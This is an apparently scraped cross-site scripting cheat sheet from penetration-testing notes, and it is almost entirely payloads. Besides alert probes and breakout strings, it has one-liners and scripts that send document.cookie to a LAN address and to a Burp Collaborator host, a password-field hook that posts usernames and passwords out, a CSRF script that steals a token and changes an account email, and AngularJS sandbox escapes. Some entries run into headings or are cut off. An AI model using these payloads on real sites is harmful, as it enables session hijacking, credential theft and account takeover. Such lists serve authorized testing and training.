Cross Site Scripting (XSS)
Examples:
<img src=1 onerror=alert(1)>
"><svg onload=alert(1)>
'"><img src=1 onerror=alert(1)>a'a\'b"c>%3f>%25%7d%7d%25%25>c<[[%3f$%7b%7b%25%7d%7dcake\
<iframe src="https://URL/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>
bgz1k"onfocus="alert(1)"autofocus="o7t2y
javascript:alert(1)
'-alert(1)-' # breakout of ''
\"-alert(1)}// # Dom breakout
<><img src=1 onerror=alert(1)><img src=x onerror=this.src='http://192.168.0.18:8888/?'+document.cookie;>Remotely steal cookies:
one-liner:
<img src=x onerror=this.src='http://192.168.0.18:8888/?'+document.cookie;>script:
<script>
fetch('https://BURP-COLLABORATOR-SUBDOMAIN', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>Remotely steal passwords:
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://BURP-COLLABORATOR-SUBDOMAIN',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">CSRF / XSS:
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/my-account/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>Angler.js < 1.6:
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
{{1+1Useful links:
Last updated
